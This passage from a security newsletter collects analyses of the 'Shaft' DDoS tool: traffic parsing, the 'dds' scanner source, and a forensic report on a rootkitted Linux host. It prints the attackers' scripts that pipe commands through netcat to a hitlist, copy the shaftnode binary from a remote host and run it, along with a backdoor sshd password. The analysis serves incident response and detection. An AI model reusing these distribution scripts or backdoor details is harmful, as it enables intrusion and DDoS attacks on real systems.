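        return None
    password, shift = deobfuscate(tok[1])
    return ShaftMsg(direction, tok[0], password, shift, int(na), int(nb), list(args))


def estimate_yield(msgs: List[ShaftMsg]) -> Dict[str, float]:
    """Reproduce the page's per-agent estimate: a pktres reply is matched to its
    request by (Na, Nb); sets * kinds / time gives packets per second per host."""
    settings = {m.cmd: int(m.args[0]) for m in msgs if m.direction == "handler->agent"
                and m.cmd in ("time", "size", "type")}
    victims = {m.args[0] for m in msgs if m.cmd == "own"}
    requests = {(m.socket_no, m.ticket) for m in msgs
                if m.cmd == "pktres" and m.direction == "handler->agent"}
    sets = [int(m.args[0]) for m in msgs if m.cmd == "pktres"
            and m.direction == "agent->handler" and (m.socket_no, m.ticket) in requests]
    if not sets or "time" not in settings or "size" not in settings:
        raise ValueError("session lacks time, size or a matched pktres reply")
    pps = sets[0] * PACKET_KINDS.get(settings.get("type"), 1) / settings["time"]
    return {"pps_per_host": pps,
            "bytes_per_sec_per_host": pps * settings["size"],
            "total_bytes_per_sec": pps * settings["size"] * len(victims)}


# Constructed sample: (UDP destination port, payload) pairs transcribed from the
# 4 Dec 1999 session captured above.
CAPTURE = [
    (18753, "alive tijgu hi 5 8170"),
    (18753, "time tijgu 700 5 6437"),
    (20433, "time tijgu 5 6437 700"),
    (18753, "size tijgu 4096 5 8717"),
    (20433, "size tijgu 5 8717 4096"),
    (18753, "type tijgu 2 5 9003"),
    (18753, "own tijgu 207.229.143.6 5 5256"),
    (20433, "owning tijgu 5 5256 207.229.143.6"),
    (18753, "pktres tijgu 207.229.143.6 5 1993"),
    (18753, "own tijgu 24.7.231.128 5 78"),
    (18753, "own tijgu 18.85.13.107 5 6247"),
    (18753, "own tijgu 24.218.52.44 5 4190"),
    (18753, "own tijgu 207.175.72.15 5 2376"),
    (20433, "pktres rghes 5 1993 51600"),
    (20433, "pktres rghes 0 0 51400"),
]

if __name__ == "__main__":
    parsed = [m for m in (parse_message(p, s) for p, s in CAPTURE) if m]
    print(*parsed, estimate_yield(parsed), sep="\n")
```

Run against the sample, the matched pktres reply and the time/size/type settings give the same figures as the estimate above (about 221 packets per second and 900 kilobytes per second per victim, roughly 4.5 megabytes per second over the five victims).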
There are also two excellent scanners for detecting DDoS agents on the network: Dittrich's "dds" [8] and Brumley's "rid" [2]. "dds" was written to provide a more portable and less dependent means of scanning for various DDoS tools. (Many people encountered problems with Perl and the Net::RawIP library [15] on their systems, which prevented them from using the scripts provided in [5], [6], and [7].) Due to time constraints during coding, "dds" does not have the flexibility necessary to specify arbitrary protocols, ports, and payloads. A modified version of "dds", geared towards detecting only "Shaft" agents, is included in the Appendix.

A better means of detecting "Shaft" handlers and agents would be to use a program like "rid", which uses a more flexible configuration file mechanism to define ports, protocols, and payloads. A sample configuration for "rid" to detect the "Shaft" control traffic as described:

   start shaft
      send udp dport=18753 data="alive tijgu hi 5 1918"
      recv udp sport=20433 data="alive" nmatch=1
   end shaft

-- 3.6 Defenses
---------------

To protect against the effects of the multiple types of denial of service, we suggest that you review the other papers (see [1, 3, 5, 6, 7]) and other methods of dealing with DDoS attacks being discussed and promoted (see [9]). For example, rate-limiting is considered effective against ICMP packet flooding attacks, while anti-spoof filters and egress filters at the border routers can limit the problems caused by attacking agents faking source addresses.

-- 4. Further evolution
-----------------------

While the author(s) of this tool did not pursue the use of encryption of its control traffic, such an evolution is conceivable, since a Caesar cipher is already used to obfuscate the password. A transition to Blowfish or other stream ciphers is realistic, and changing the communication protocol to ICMP, much like TFN, is conceivable. The use of multicast protocols for either communication or packet flooding is also possible.
To date, no source for the "Shaft" handler ("shaftmaster") has been obtained or analyzed. At this stage, the code is believed to be private. This would mean that the authors could likely change defaults, and the probability of detecting "script kiddie" copycats using the default values analyzed here is low. This argues for rapid and widespread detection efforts to identify agents before such a change.

-- 5. Conclusion
----------------

"Shaft" is another DDoS variant with independent origins. The code recovered did appear to be still in development. Several key features indicate evolutionary trends as the genre develops. Of significance is the priority placed on packet generation statistics, which would allow host selection to be refined.

The analysis of the code and binary was greatly enhanced by the capture of attack preparation and command packets. The captured packets made it possible to assess the impact of a single agent that managed to saturate the network pipe.

The version analyzed had hooks which would allow for dynamic changes to the master host and control port, but not the agent control port. However, such items are trivially incorporated and must not be taken to be indicative of any current versions which may be in active use. The obfuscation of master IP, ports and passwords used a relatively simple form of encryption, but this could easily be strengthened. The detection of DDoS installations will become very much more difficult as such metamorphosis techniques progress; the presence of such agents will still be more readily determined by analysis of traffic anomalies, with a consequent pressure on time and resources for site administrators and security teams.

-- APPENDIX A: References
-------------------------

[1] Barlow, Jason and Woody Thrower. TFN2K An Analysis
    http://www2.axent.com/swat/News/TFN2k_Analysis.htm
[2] Brumley, David. Remote Intrusion Detector.
    http://theorygroup.com/Software/RID
[3] CERT Distributed System Intruder Tools Workshop report
    http://www.cert.org/reports/dsit_workshop.pdf
[4] CERT Advisory CA-99-17 Denial-of-Service Tools
    http://www.cert.org/advisories/CA-99-17-denial-of-service-tools.html
[5] Dittrich, David. The DoS Project's "trinoo" distributed denial of service attack tool
    http://staff.washington.edu/dittrich/misc/trinoo.analysis
[6] Dittrich, David. The "Tribe Flood Network" distributed denial of service attack tool
    http://staff.washington.edu/dittrich/misc/tfn.analysis
[7] Dittrich, David. The "Stacheldraht" distributed denial of service attack tool
    http://staff.washington.edu/dittrich/misc/stacheldraht.analysis
[8] Dittrich, David, Marcus Ranum, George Weaver, David Brumley et al.
    http://staff.washington.edu/dittrich/dds
[9] Dittrich, David. Distributed Denial of Service (DDoS) Attacks/Tools
    http://staff.washington.edu/dittrich/misc/ddos/
[10] lsof: http://vic.cc.purdue.edu/
[11] ngrep: http://www.packetfactory.net/ngrep/
[12] Packet Storm Security, Distributed denial of service attack tools
     http://packetstorm.securify.com/distributed/
[13] Phrack Magazine, Volume Seven, Issue Forty-Nine, File 06 of 16, [ Project Loki ]
     http://www.phrack.com/search.phtml?view&article=p49-6
[14] Phrack Magazine, Volume 7, Issue 51, September 01, 1997, article 06 of 17, [ L O K I 2 (the implementation) ]
     http://www.phrack.com/search.phtml?view&article=p51-6
[15] Net::RawIP: http://quake.skif.net/RawIP
[16] tcpdump: ftp://ftp.ee.lbl.gov/tcpdump.tar.Z
[17] Schneier, Bruce. Applied Cryptography, 2nd edition, Wiley.
[18] Stevens, W. Richard and Gary R. Wright. TCP/IP Illustrated, Vol. I, II, and III. Addison-Wesley.
[19] Zuckerman, M.J. Net hackers develop destructive new tools. USA Today, 7 December 1999.
     http://www.usatoday.com/life/cyber/tech/review/crg681.htm

-- APPENDIX B: dds ("Shaft" only variant)
-----------------------------------------

/*
 * dds $Revision: 1.6s $ - a distributed DoS tool scanner - Shaft only
 *
 * Based on the gag scanner, written by David Dittrich, University
 * of Washington, Marcus Ranum, Network Flight Recorder, with
 * code contributed by others, and based on an idea stolen from
 * George Weaver, Pennsylvania State University.
 *
 * Dave Dittrich
 * Marcus Ranum
 * George Weaver
 * David Brumley
 */

/* Shaft only version, modified to that effect by
 * Sven Dietrich
 */

#if YOU_HAVE_NOT_READ_THIS_YET
This software should only be used in compliance with all applicable laws
and the policies and preferences of the owners of any networks, systems,
or hosts scanned with the software.

The developers and licensors of the software provide the software on an
"as is" basis, excluding all express or implied warranties, and will not
be liable for any damages arising out of or relating to use of the software.

THIS SOFTWARE IS MADE AVAILABLE "AS IS", AND THE UNIVERSITY OF WASHINGTON
DISCLAIMS ALL WARRANTIES, EXPRESS OR IMPLIED, WITH REGARD TO THIS SOFTWARE,
INCLUDING WITHOUT LIMITATION ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND
FITNESS FOR A PARTICULAR PURPOSE, AND IN NO EVENT SHALL THE UNIVERSITY OF
WASHINGTON BE LIABLE FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR
ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER
IN AN ACTION OF CONTRACT, TORT (INCLUDING NEGLIGENCE) OR STRICT LIABILITY,
ARISING OUT OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
#endif

#define VERSION "$Revision: 1.6s $"

/* __FAVOR_BSD only has an effect if defined before the netinet headers */
#define __FAVOR_BSD

/* The header names did not survive the text extraction of this listing;
 * the set below is what the code actually uses. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <signal.h>
#include <sys/types.h>
#include <sys/time.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netinet/udp.h>
#include <arpa/inet.h>

#define BS 1024

/* The two arrays below are for address range calculations.
   They should have been automatically generated, but
     1) I am lazy.
     2) There are a few special cases in them.
   I will not scan more than a /16.  When we do scan a CIDR block, we
   assume that it actually is a CIDR block, and do not scan the network
   or broadcast address.
*/
static unsigned long MaskBits[] = {
    0x00000000, /* /0 */
    0x00000000, /* /1 */
    0x00000000, /* /2 */
    0x00000000, /* /3 */
    0x00000000, /* /4 */
    0x00000000, /* /5 */
    0x00000000, /* /6 */
    0x00000000, /* /7 */
    0x00000000, /* /8 */
    0x00000000, /* /9 */
    0x00000000, /* /10 */
    0x00000000, /* /11 */
    0x00000000, /* /12 */
    0x00000000, /* /13 */
    0x00000000, /* /14 */
    0x00000000, /* /15 */
    0xffff0000, /* /16, Class B */
    0xffff8000, /* /17, 128 * Class C */
    0xffffc000, /* /18, 64 * Class C */
    0xffffe000, /* /19, 32 * Class C */
    0xfffff000, /* /20, 16 * Class C */
    0xfffff800, /* /21, 8 * Class C */
    0xfffffc00, /* /22, 4 * Class C */
    0xfffffe00, /* /23, 2 * Class C */
    0xffffff00, /* /24, Class C */
    0xffffff80, /* /25, 128 hosts */
    0xffffffc0, /* /26, 64 hosts */
    0xffffffe0, /* /27, 32 hosts */
    0xfffffff0, /* /28, 16 hosts */
    0xfffffff8, /* /29, 8 hosts */
    0xfffffffc, /* /30, 4 hosts (PPP link) */
    0xfffffffe, /* /31, invalid */
    0xffffffff, /* /32, host */
};

static int NumHosts[] = {
    0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, /* don't scan more than a /16 */
    65534, /* These are all -2 so that we don't scan the broadcast addr or the network addr */
    32766, 16382, 8190, 4094, 2046, 1022, 510, 254, 126, 62, 30, 14, 6, 2,
    0, /* /31 */
    1, /* /32 */
};

extern char *optarg;

struct udppkt_t {
    struct ip ipi;
    struct udphdr udpi;
    char buffer[BS];
} udppkt;

static void listener(void);
static int usage(void);

static int vflg = 0;    /* verbosity */
static int dflg = 0;    /* debugging */

/* shaft variables */
static short shaft_dstport = 18753; /* agent listen port: probes are sent here */
static short shaft_rctport = 20433; /* handler listen port: agent replies come back here */
char shaft_scmd[] = "alive";
char shaft_spass[] = "tijgu";
char shaft_echostr[] = "alive";

int
main(int argc, char **argv)
{
    int pid;
    unsigned long target_host;
    struct in_addr target_ip;
    int mask;
    char *mask_ptr;
    int result;
    int usock;
    struct sockaddr_in usa;
    int i;
    int sleepytime = 500;
    int bigsleep = 30;
    int num_hosts;
    char sbuf[BS];

    while ((i = getopt(argc, argv, "ds:S:v")) != -1) {
        switch (i) {
        case 'd':
            dflg++;
            break;
        case 's':
            sleepytime = atoi(optarg);
            if (sleepytime <= 0) {
                fprintf(stderr, "WARNING: zero interpacket sleep time will probably overflow your system's transmit buffers and yield poor results\n");
                sleepytime = 1;
            }
            break;
        case 'S': {
            /* parse into a temporary so the default really is kept on bad input */
            int v = atoi(optarg);
            if (v <= 0)
                fprintf(stderr, "WARNING: negative sleep value - staying with default of %d\n", bigsleep);
            else
                bigsleep = v;
            break;
        }
        case 'v':
            vflg++;
            break;
        default:
            exit(usage());
        }
    }

    if (optind >= argc || argc - optind > 1)
        exit(usage());

    mask_ptr = strchr(argv[optind], '/');
    /* if a CIDR block is passed in */
    if (mask_ptr) {
        *mask_ptr = '\0';
        mask_ptr++;
        /* reject anything that would index past the tables above */
        if (sscanf(mask_ptr, "%d", &mask) != 1 || mask < 0 || mask > 32) {
            fprintf(stderr, "%s: Bad mask: /%s\n", argv[0], mask_ptr);
            exit(-1);
        }
    } else {
        printf("No mask passed, assuming host scan (/32)\n");
        mask = 32;
    }

    result = inet_aton(argv[optind], &target_ip);
    if (result == 0) {
        fprintf(stderr, "%s: Bad IP address: %s\n", argv[0], argv[optind]);
        exit(-1);
    }

    if (mask < 16) {
        fprintf(stderr, "Bad Network Admin! Bad! Do not scan more than a /16 at once!\n");
        exit(-1);
    }

    num_hosts = NumHosts[mask];
    if (num_hosts == 0) {
        fprintf(stderr, "Cannot scan a /%d. Exiting...\n", mask);
        exit(-1);
    }

    if (vflg) {
        printf("Mask: %d\n", mask);
        printf("Target: %s\n", inet_ntoa(target_ip));
        printf("dds %s - scanning...\n\n", VERSION);
    }

    /* the probe an agent answers: "alive" plus the default Caesar-shifted password */
    snprintf(sbuf, sizeof(sbuf), "%s %s hi 5 1918", shaft_scmd, shaft_spass);

    target_host = ntohl(target_ip.s_addr);
    target_host &= MaskBits[mask];
    target_ip.s_addr = htonl(target_host);

    if ((pid = fork()) < 0) {
        perror("cannot fork");
        exit(1);
    }

    /* child side listens for return packets */
    if (pid == 0)
        listener();

    sleep(1);

    /* main sweep loop - COULD be expanded to whole Internet but... */
    /* but that would be _very_ bad.... */
    while (num_hosts) {
        if (mask != 32) {
            target_host++;
        }
        target_ip.s_addr = htonl(target_host);
        num_hosts--;

        /* we really need to skip the network and broadcast addresses */
        if ((target_host & 0xff) == 0 || (target_host & 0xff) == 0xff) {
            if (vflg)
                printf("Skipping special address %s\n", inet_ntoa(target_ip));
            continue;
        }

        if (vflg)
            printf("Probing address %s\n", inet_ntoa(target_ip));

        /* shaft check */
        memset(&usa, 0, sizeof(usa));
        usa.sin_family = AF_INET;
        usa.sin_addr.s_addr = target_ip.s_addr;
        usa.sin_port = htons(shaft_dstport);

        if (dflg)
            fprintf(stderr, "Sending UDP to: %s\n", inet_ntoa(usa.sin_addr));

        if ((usock = socket(AF_INET, SOCK_DGRAM, 0)) < 0) {
            perror("cannot open UDP socket");
            exit(1);
        }
        i = sendto(usock, sbuf, strlen(sbuf), 0, (struct sockaddr *)&usa, sizeof(usa));
        if (i < 0) {
            char ebuf[BS];
            snprintf(ebuf, sizeof(ebuf), "sendto: udp %s", inet_ntoa(usa.sin_addr));
            perror(ebuf);
            close(usock);
            break;
        }
        close(usock);
        usleep(sleepytime);
    }

    /* wait for any late responses */
    if (dflg)
        fprintf(stderr, "Waiting %d seconds for late responses.\n", bigsleep);
    sleep(bigsleep);

    /* shut listener. if this fails the listener exits on its own */
    (void)kill(pid, SIGHUP);
    exit(0);
}

static void
listener(void)
{
    int usock;
    int i;
    socklen_t len;
    fd_set fdset;
    char buf[BS];
    struct timeval timi;
    struct sockaddr_in sa, from;

    /* child becomes a listener process */
    if ((usock = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) < 0) {
        perror("cannot open UDP listen socket");
        exit(1);
    }
    memset(&sa, 0, sizeof(sa));
    sa.sin_family = AF_INET;
    sa.sin_addr.s_addr = INADDR_ANY;
    sa.sin_port = htons(shaft_rctport);
    if (bind(usock, (struct sockaddr *)&sa, sizeof(sa)) < 0) {
        perror("cannot bind to socket");
        exit(-1);
    }

    while (1) {
        /* if parent has exited, die */
        if (getppid() == 1)
            exit(0);

        FD_ZERO(&fdset);
        FD_SET(usock, &fdset);
        timi.tv_sec = 1;
        timi.tv_usec = 0;
        select(usock + 1, &fdset, NULL, NULL, &timi);
        usleep(100);
        if (FD_ISSET(usock, &fdset)) {
            /* read data from UDP listen socket */
            len = sizeof(from);
            if ((i = recvfrom(usock, buf, BS - 1, 0, (struct sockaddr *)&from, &len)) < 0) {
                perror("recvfrom");
                continue;
            }
            buf[i] = '\0';  /* terminate, so strstr() cannot run past the datagram */

            if (dflg)
                fprintf(stderr, "Listener got a UDP packet on port %d\n", shaft_rctport);

            /* shaft check */
            if (strstr(buf, shaft_echostr)) {
                printf("Received '%s' from %s", shaft_echostr, inet_ntoa(from.sin_addr));
                printf(" - probable shaft agent\n");
            } else {
                printf("Unexpected UDP packet received on port %d from %s\n",
                       shaft_rctport, inet_ntoa(from.sin_addr));
            }
        }
    }
}

static int
usage(void)
{
    fprintf(stderr, "usage: dds [options] target\n");
    fprintf(stderr, "target is CIDR block to scan in form:\n");
    fprintf(stderr, "\tA.B.C.D/mask\n");
    fprintf(stderr, "Options:\n");
    fprintf(stderr, "\t[-v] turns on verbosity\n");
    fprintf(stderr, "\t[-d] turns on debugging\n");
    fprintf(stderr, "\t[-s] interpacket sleep in microseconds\n");
    fprintf(stderr, "\t[-S] delay for late packets\n");
    return (1);
}

---
Dr. Sven Dietrich
Raytheon ITSS                            | spock@sled.gsfc.nasa.gov
ESDIS Project, Code 586, Blg 32 Rm N231  | +1-301-614-5119 | 614-5270 Fax
NASA Goddard Space Flight Center         | Greenbelt, MD 20771, USA

@HWA

111.1 Shaft Node/Master analysis by Rick Wash & Jose Nazario
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Source: PSS

---[ ]---  Analysis of a Shaft Node and Master  -  March 26, 2000  ---[ ]---

Rick Wash      rlw6@po.cwru.edu
Jose Nazario   jose@biocserver.cwru.edu

Section 0: Introduction
=======================

This analysis is in addition to Sven Dietrich's analysis, dated March 16, 2000, of the Shaft DDoS tool. The analysis we provide here is a description of the rootkit used and the methods of distribution of the tool. We share this information so that other site and system administrators can examine their systems for compromise and use as Shaft nodes.

Note: This file can be found at:
   http://biocserver.cwru.edu/~jose/shaft_analysis/

The user names and host IDs have been munged. We have tried to contact the domain admins whose networks have appeared anywhere in any of these files.

---------[ How We Found This Information

Once we were alerted that our machine may have been compromised, we performed both network and host based scans. A network port scan (using nmap) revealed port 5002/tcp open and listening. Furthermore, it revealed port 22/tcp (ssh) open, which was not installed by the system administrator.

A host based scan revealed similarly that port 5002/tcp was listening. An analysis with rpm -Va revealed differences in sizes and MD5 sums for the components of the root kit, but did not reveal the Shaft toolkit. At this time the system was taken offline and the disk was mounted in another trusted system and analyzed from there.
Local administrators had noted that the system had become unstable over autumn, corresponding to the tests of the Shaft DDoS tool.

Section 1: The Rootkit Used
===========================

----------------[ What We Found

One of the significant things we found while analyzing the box was a directory and set of files that I will call the sda69 toolkit. It was found in /dev (/dev/sda69 and 4 files sda69[a-d]). This appears to be the attackers' working directory, so most of their scripts and files are stored there.

It appears that much of their older work from when they originally compromised the box was stored in a subdirectory called ". " (dot space, "/dev/sda69/. "). This directory contained 6 files that made up a system for sniffing the ethernet network and analyzing the sniffer logs. Here is a list of the files and what they do:

-rwxr-xr-x   1 0        20          28969 Apr  4  1999 idle

This was their sniffer. It was designed to sniff ports 21/tcp and 23/tcp (ftp and telnet, respectively). It would capture the first x bytes of each connection, log them to a file, and move on to the next connection. This was used to gather passwords, since both ftp and telnet send passwords in plaintext. This sniffer only logged in one direction (the data flowing from the machine that started the connection to the destination machine). This was done because the other direction rarely contains useful information. The output file in this case was tcp.log. The program was named idle probably to fool any sysadmin who noticed it in ps into believing it was just idle time.

-rw-r--r--   1 0        0          456799 Jun 11  1999 tcp.log

This was their sniffer log. It contained data in the form:

   src_ip => dst_ip [port]
   data
   ...
   ----- [method of connection termination]

This log only contained information for ports 21 and 23. It did also contain a number of passwords.
-rwxr-xr-x   1 0        0            2795 May 12  1999 pp.pl

This was a perl script that extracted usernames and passwords from their sniffer log files.

-rw-r--r--   1 0        0               6 Apr 28  1999 sniff.pid

This is a standard pid lock file for the sniffer.

-rw-r--r--   1 0        20           7654 Apr  4  1999 s

A simple SYN flood program.

-rwxrwxr-x   1 0        0            7656 Aug 28  1998 chattr

This is the standard linux chattr program, linked dynamically against libc6.

This material in ". " shows that the attackers did use this box for sniffing passwords from the ethernet network that it was connected to. It is currently unknown if the attackers did anything else during this time frame (May-June 1999).

--------[ Linux Trojan Horse Programs Found

Investigation of the compromised Linux host yielded the following trojan horse programs. They were found by mounting the disc read-only and without executable permissions set. A full recursive file listing was then performed (ls -lartRi /mnt) which quickly revealed the trojan horse binaries:

    20563 -rwxrwxr-x   1 root     root       437428 Sep 15  1998 vi
    20554 -rwxrwxr-x   1 root     root       262756 Oct  2  1998 tcsh
   313370 -r-xrwxr-x   1 root     root        31312 Oct  3  1998 ps

Examination of the binaries using strings(1), together with additional files on the system, reveals the method of operation of the new binaries. The file sizes were sometimes larger, most likely due to being statically linked against an older C library (libc5 on a libc6 system). On a running host, examination by using RPM in verify mode (rpm -Va) showed file sizes, permissions and MD5 sums were off when compared to the database on the system.

ls
The ls trojan we found has the effect of not listing files listed in a hidden configuration file, /dev/sda69c. As such, it's highly extensible. Several utilities were hidden, including elements of the Shaft toolkit and even some terminals.

netstat
Examination of the replaced netstat binary reveals that it is used to hide connections to or from certain networks and on certain ports.
The networks and ports were configured using the file /dev/sda69b, an additional element of the rootkit.

ps
Again, used to hide activity. The trojan horse ps(1) binary makes a reference to the file /dev/sda69a, which contains a listing of processes and terminals to hide. A fairly typical rootkit listing, including sniffers, scanners, the eggdrop IRC script, and the backdoored sshd.

updatedb
The program updatedb(1L), normally a link to slocate(1), was replaced with a shell script. Again, used to hide signs of the rootkit tools.

locate
Similar to updatedb's trojan, used to hide the rootkit and Shaft toolkit.

find
Again, used to hide the toolkits; calls the file /dev/sda69c in a similar way to the ls trojan to hide files.

dir
vdir
See ls, used in the same fashion.

killall
Replaced, calls /dev/sda69a, a listing of processes and terminals. Used to prevent the halting of the intruder's processes.

syslogd
Replaced, calls /dev/sda69d, a list of domains. Presumably it prevents logging when hosts from these domains connect.

tcpd
The TCP wrappers executable, calls /dev/sda69b and prevents access checking from those networks and on those ports.

inetd
Appears to be a combined portmapper and inetd daemon, perhaps to allow for access or system control via RPC calls.

sshd
Trojaned sshd 1.2.26, statically linked against libc5. Contains a backdoor password "rOOTkIT" which yields a root shell without logging.

ifconfig
Replaced, with the trojan version omitting any reporting of the PROMISC setting, hiding the use of the sniffing software.

-----------[ Solaris SPARC Trojans Found

During the course of our investigation into the toolkit, we also found several key binaries for Solaris as trojan horse programs. Within the archive (neet.tar) there is a script plus several binary replacements for the SPARC architecture. The script installs an inetd trojan, and a ps and update trojan as well. These are then run. Log wiping is also done.
System compromise is presumably through a known exploit. We performed no real analysis on the trojan horse programs for SPARC as we did not examine a Solaris node of the Shaft tool.

-rwx------   1 510      510         39544 Mar 18  1999 doc

This appears to be their trojaned SPARC Solaris inetd binary.

-rwx------   1 510      510         24356 Mar 18  1999 ps

This appears to be their trojaned SPARC Solaris ps binary.

-rwx------   1 510      510         25548 Mar 18  1999 update

Solaris does not use update, though SunOS 4.x did. This is probably to confuse the administrator should they stumble across the file. According to George Weaver this is a standard solsniffer, a Solaris sniffer. The logfiles are expected to be in /usr/man/tmp/output on infected Solaris boxes.

----------[ Trojan Executable Configuration Files

In addition to these files, four more files were recovered that appear to contain information used by the rootkit that was installed on this system. These files are /dev/sda69[a-d]. Here is a listing of what is contained in these files:

sda69a

This file has the format "number name", where number indicates what type of information follows (always either 1 or 3) and name indicates the data. For this file, 1 indicates that what follows is a terminal name, and 3 indicates that what follows is an executable name. This file is used by the trojaned ps and killall to prevent the sysadmin from seeing or killing the executables listed here, or anything from the listed terminals. The contents of the file:

   3 egg
   3 linsniffer
   1 p0
   1 p1
   3 sniffer
   3 mscan
   3 bash
   3 idle
   3 screen
   3 ssynk4
   3 sshd
   3 ssh
   3 sshd1
   3 s

sda69b

The format of this file is the same as the format of sda69a, but the contents differ. The 1 in this case means that the data is a subnet to ignore. The 3 in this case is a specific port number. This file is used by the trojaned netstat and tcpd to know which IPs to hide, which IPs to always let in, and which ports to hide. An example of the contents follows:

   1 xxx.
   3 6667
   1 yyy.
   3 23
   1 zzz.
1 ddd.eee
1 ccc.
3 513
1 bbb.aaa.
3 22

Here, the three letter combinations represent single numbers from IP addresses. This file would specify that everyone from xxx.*.*.* would be allowed into this machine, and no connections from these IP's would appear in netstat. Also, programs listening on ports 6667, 23, 513, and 22 (irc, telnet, rlogin, and ssh) would not appear in a normal netstat.

sda69c
This file is a list of files, one file per line, that were installed on this system by the attackers. This file is used by ls, dir, vdir, and find to know what files not to list when the admin tries to look through the filesystem.

sda69d
This file is a list of providers, one per line. This file is used by the trojaned syslog to know what messages should not be logged.

Section 2: Distribution Methods of the Shaft Toolkit
====================================================

Their more recent work (which includes working with the Shaft DDoS tool) is all in the base sda69 directory (/dev/sda69). Here is a list of files recovered and what they do:

-rwxr-xr-x   1 0        0           25123 Nov 28 14:34 shaftmaster
-rwxr-xr-x   1 0        0           15184 Nov 28 14:47 shaftnode
These are the master and node executables for the Shaft DDoS tool. For more information, see: http://sled.gsfc.nasa.gov/~spock/shaft_analysis.txt

-rwxr-xr-x   1 0        0           19806 Nov 28 14:41 shaftnode.c
This is the source file for the Shaft node program. More information can be found at the same location as above.

-rwxr-xr-x   1 0        0          165632 Nov 28 16:34 nc
This appears to be the standard netcat executable. This executable was used by the scripts to remotely execute commands.

-rw-r--r--   1 0        0             596 Nov 28 17:12 hitlist
This file contains a list of target machines, one machine per line. These were evidently targets to receive the shaftnode program, having previously been compromised.
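An incident responder who recovers the /dev/sda69[a-d] files described above wants to know exactly what the rootkit was hiding. The parser below is an added example, not part of the original analysis; the sample sda69a and sda69b contents are copied from the listings above, the sda69c and sda69d samples are constructed, and the exact-name matching in the last function is an assumption (the analysis does not say how loosely the trojaned ps matches).

```python
"""Parse the rootkit's /dev/sda69[a-d] hide-lists into a report (added example).
sda69a and sda69b hold "<number> <name>" lines with number 1 or 3; sda69c is one
hidden path per line; sda69d is one silenced domain per line."""
from dataclasses import dataclass, field

# Sample contents, copied from the listings quoted in the analysis.
SDA69A = """3 egg
3 linsniffer
1 p0
1 p1
3 sniffer
3 mscan
3 bash
3 idle
3 screen
3 ssynk4
3 sshd
3 ssh
3 sshd1
3 s
"""
SDA69B = """1 xxx.
3 6667
1 yyy.
3 23
1 zzz.
1 ddd.eee
1 ccc.
3 513
1 bbb.aaa.
3 22
"""
SDA69C = "/dev/sda69\n/usr/man/tmp\n"   # constructed sample of hidden paths
SDA69D = "example.invalid\n"            # constructed placeholder domain


@dataclass
class HideConfig:
    hidden_processes: list = field(default_factory=list)   # sda69a, type 3
    hidden_terminals: list = field(default_factory=list)   # sda69a, type 1
    ignored_subnets: list = field(default_factory=list)    # sda69b, type 1
    hidden_ports: list = field(default_factory=list)       # sda69b, type 3
    hidden_paths: list = field(default_factory=list)       # sda69c
    silenced_domains: list = field(default_factory=list)   # sda69d
    malformed: list = field(default_factory=list)          # lines fitting no rule


def _typed_lines(text, name, malformed):
    """Yield (type, value) from a "<number> <name>" file. Only types 1 and 3
    were observed, so anything else is reported rather than guessed at."""
    for lineno, raw in enumerate(text.splitlines(), 1):
        parts = raw.strip().split(None, 1)
        if not parts:
            continue
        if len(parts) != 2 or parts[0] not in ("1", "3"):
            malformed.append(f"{name}:{lineno}: {raw!r}")
            continue
        yield parts[0], parts[1]


def parse_hide_config(a, b, c, d):
    cfg = HideConfig()
    for kind, value in _typed_lines(a, "sda69a", cfg.malformed):
        (cfg.hidden_terminals if kind == "1" else cfg.hidden_processes).append(value)
    for kind, value in _typed_lines(b, "sda69b", cfg.malformed):
        if kind == "1":
            cfg.ignored_subnets.append(value)
        elif value.isdigit() and 0 < int(value) < 65536:
            cfg.hidden_ports.append(int(value))
        else:
            cfg.malformed.append(f"sda69b: bad port {value!r}")
    cfg.hidden_paths = [ln.strip() for ln in c.splitlines() if ln.strip()]
    cfg.silenced_domains = [ln.strip() for ln in d.splitlines() if ln.strip()]
    return cfg


def processes_a_trojaned_ps_would_hide(proc_table, cfg):
    """Compare a trusted process list (walked from /proc; here constructed as
    (pid, tty, command) tuples) against the hide-list. Exact matching on the
    command name and terminal is an assumption made for this example."""
    return [p for p in proc_table
            if p[2] in cfg.hidden_processes or p[1] in cfg.hidden_terminals]
```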
-rwxr-xr-x   1 0        0              84 Nov 28 16:36 dos.sh
This shell script runs the command dospipe.sh and sends the output to each of the IP's in the file hitlist, port 21 (ftp). This script is a wrapper around dospipe.sh that executes it for each of the machines in hitlist and sends it to the machine. Here is the code from that file:

#!/bin/sh
for i in `cat hitlist` ; do
(./dospipe.sh | ./nc -p 53982 $i 21 &) ; done

-rwxr-xr-x   1 0        0             186 Nov 28 16:41 dospipe.sh
This shell script outputs a series of commands that are intended to upload and run a copy of their shaftnode executable to the target machine. This script automates the process of uploading and running their node executables. Here is the code for the script:

#!/bin/sh
echo "oir##t"
echo "QUIT"
sleep 5
echo "cd /tmp"
sleep 5
echo "rcp user@host:shaftnode ./"
sleep 5
echo "chmod +x shaftnode"
sleep 5
echo "./shaftnode"
echo "exit"

The first couple of lines (the first two echo commands) appear to signify that a backdoor is being used on the target machines' ftp servers to get the root shell they need. The first two lines are sent to the trojaned ftp server, and the following lines appear to be commands sent to a root shell.

-rwxr-xr-x   1 0        0          122880 Oct 24 02:13 duh.tar
This is a tar file archive of the next five files: bd.sh, bdpipe.sh, massbd.sh, neet.tar and unf.

-rwxr-xr-x   1 0        0             104 Oct 24 01:55 unf
This file is another list of IP's, presumably a list of targets for this "bd" system.

-rwxr-xr-x   1 0        0           10240 Oct 24 02:11 bd.sh
This, despite its file extension, is a tar file containing the two files bdpipe.sh and massbd.sh. I believe that this being a tar file is a mistake and that it should be a shell script that resembles the script dos.sh.

-rwxr-xr-x   1 0        0              53 Aug  7  1999 massbd.sh
This is a shell script that iterates through all of the lines in a file and runs the script bd.sh on each of them in the background. This means that it runs bd.sh on each of the lines in the file roughly at the same time.
I suppose that the file unf is used for this purpose. Here is the code for the script:

#!/bin/sh
